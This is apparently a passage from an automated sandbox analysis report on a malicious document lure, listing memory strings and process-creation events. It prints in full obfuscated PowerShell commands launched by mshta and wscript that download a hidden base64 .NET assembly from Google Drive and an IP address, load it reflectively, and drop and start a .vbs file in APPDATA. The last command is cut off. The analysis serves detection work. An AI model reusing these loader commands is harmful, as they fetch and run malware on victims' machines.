                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000013.00000002.514711440.0000000000250000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: D:\New Private Panell Src 3.0\Microsoft.Win32.TaskScheduler Rump\obj\Release\net45\Microsoft.Win32.TaskScheduler.pdb source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: PO NAHK22012FA00000.docx.docInitial sample: OLE indicators vbamacros = False

                  Data Obfuscation

                  barindex
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net.WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object { aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = [System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = [dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,ztsdesativadozts,'+'ztsdesativadozts,zts1zts,ztsdesativadozts));').replacE('aUK','$').replacE('zts',[sTRinG][cHAr]39).replacE('drb','|')| . ( $pSHoMe[21]+$PShoME[34]+'X')"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net.WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object { aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = [System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = [dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,ztsdesativadozts,'+'ztsdesativadozts,zts1zts,ztsdesativadozts));').replacE('aUK','$').replacE('zts',[sTRinG][cHAr]39).replacE('drb','|')| . ( $pSHoMe[21]+$PShoME[34]+'X')"Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEm32\WindOwsPoWErSHEll\v1.0\PoweRshELL.exE" "POWERsheLl -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe ; iex($(iEx('[SysTEM.tEXT.ENcODING]'+[Char]58+[chAr]58+'utf8.GeTStriNG([sysTem.CONVerT]'+[cHar]0X3A+[CHAr]0x3a+'FrOMBASE64STrINg('+[ChAR]0x22+'JEZYM0s5RDc1TktmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtdHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFZklOSVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGNrY1BoYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFXSkxTaU8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTUGl1VmssdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTXZ1bmphZ0RWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUt4U2tndUgpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiciIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEd4ZVNNVkJxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkRlgzSzlENzVOS2Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly84NS4yMTUuMjA2LjgyLzI3MC9pZ2V0YmVzdHRoaW5nc3dpdGhiZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc29ubWUudElGIiwiJEVudjpBUFBEQVRBXGdldGJlc3R0aGluZ3N3aXRoYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3Nvbi52YlMiLDAsMCk7U3RBclQtU2xlRVAoMyk7U1RBUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcZ2V0YmVzdHRoaW5nc3dpdGhiZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc29uLnZiUyI='+[cHAR]34+'))')))"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEm32\WindOwsPoWErSHEll\v1.0\PoweRshELL.exE" "POWERsheLl -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe ; iex($(iEx('[SysTEM.tEXT.ENcODING]'+[Char]58+[chAr]58+'utf8.GeTStriNG([sysTem.CONVerT]'+[cHar]0X3A+[CHAr]0x3a+'FrOMBASE64STrINg('+[ChAR]0x22+'JEZYM0s5RDc1TktmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtdHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFZklOSVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGNrY1BoYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFXSkxTaU8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTUGl1VmssdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTXZ1bmphZ0RWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUt4U2tndUgpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiciIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEd4ZVNNVkJxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkRlgzSzlENzVOS2Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly84NS4yMTUuMjA2LjgyLzI3MC9pZ2V0YmVzdHRoaW5nc3dpdGhiZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc29ubWUudElGIiwiJEVudjpBUFBEQVRBXGdldGJlc3R0aGluZ3N3aXRoYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3Nvbi52YlMiLDAsMCk7U3RBclQtU2xlRVAoMyk7U1RBUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcZ2V0YmVzdHRoaW5nc3dpdGhiZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc29uLnZiUyI='+[cHAR]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEm32\WindOwsPoWErSHEll\v1.0\PoweRshELL.exE" "POWERsheLl -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe ; iex($(iEx('[SysTEM.tEXT.ENcODING]'+[Char]58+[chAr]58+'utf8.GeTStriNG([sysTem.CONVerT]'+[cHar]0X3A+[CHAr]0x3a+'FrOMBASE64STrINg('+[ChAR]0x22+'JEZYM0s5RDc1TktmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtdHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFZklOSVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGNrY1BoYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFXSkxTaU8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTUGl1VmssdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTXZ1bmphZ0RWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUt4U2tndUgpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiciIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEd4ZVNNVkJxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkRlgzSzlENzVOS2Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly84NS4yMTUuMjA2LjgyLzI3MC9pZ2V0YmVzdHRoaW5nc3dpdGhiZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc29ubWUudElGIiwiJEVudjpBUFBEQVRBXGdldGJlc3R0aGluZ3N3aXRoYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3Nvbi52YlMiLDAsMCk7U3RBclQtU2xlRVAoMyk7U1RBUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcZ2V0YmVzdHRoaW5nc3dpdGhiZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc29uLnZiUyI='+[cHAR]34+'))')))"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdhVUtpbWFnZVVybCA9IHp0c2h0dHBzOi8vZCcrJ3JpdmUuZ29vZ2xlLmNvbS91YycrJz9leHBvJysncnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHp0czsnKydhVUt3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O2FVS2ltYWdlQnl0ZXMgPSBhVUt3JysnZWJDbGllbnQuRG93bmxvYWREYXRhKGFVS2ltYWdlVXJsKTthVUtpbWFnZVRleCcrJ3QgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhhVUtpbWFnZUJ5dGVzKTthVUtzdGFydEZsYWcgPSB6dHM8PEJBU0U2NF9TVEFSVD4+enRzO2FVS2VuZEZsYWcnKycgPSB6dHM8PEJBU0U2NF9FTkQ+Pnp0czthVUtzdGFydEluZGV4ID0gYVVLaW1hZ2VUZXh0LkluZGV4T2YoYVVLc3RhcnRGbGFnKTthVUtlbmRJbmRleCA9IGFVS2ltYWdlVGV4dC5JbmRleE9mKGFVS2VuZEZsYWcpO2FVS3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBhVUtlbmRJbmRleCAtZ3QnKycgJysnYVVLc3RhcnRJbmRleDthVUtzdCcrJ2FydEluZGV4ICs9IGFVS3N0YXJ0RmxhZy5MZW5nJysndGg7YVVLYmFzZTY0TGVuZ3RoID0gYVVLZW5kSW5kZXggLSBhVUtzdGFydEluZGV4O2FVS2JhJysnc2U2NENvbW1hbmQgPSBhVUtpbWFnZVRleHQuU3Vic3RyaW5nKGFVS3N0YXJ0SW5kZXgsIGFVS2Jhc2U2NExlbmd0aCk7YVVLYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoYVVLYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIGRyYiBGb3JFYWNoLU9iamVjdCB7IGFVS18gfSlbLTEuLi0oYVVLYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTthVUtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdJysnOjpGcm9tQmFzJysnZTY0U3RyaW5nKGFVS2Jhc2U2NFJldmVyc2VkKTthVUtsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoYVVLY29tbWFuZEJ5dGVzKTthVUt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0JysnaG9kKHp0c1ZBSXp0cyk7YVVLdmFpTWUnKyd0aG9kLkludm9rZShhVUtudWxsLCBAKHonKyd0c3R4dC5FQ0RGRlJXLzA3Mi8yOC42MDIuNTEyLjU4Ly86cHR0aHp0cywgenRzZGVzYXRpdmFkb3p0JysncywgenRzZGVzJysnYXRpdmEnK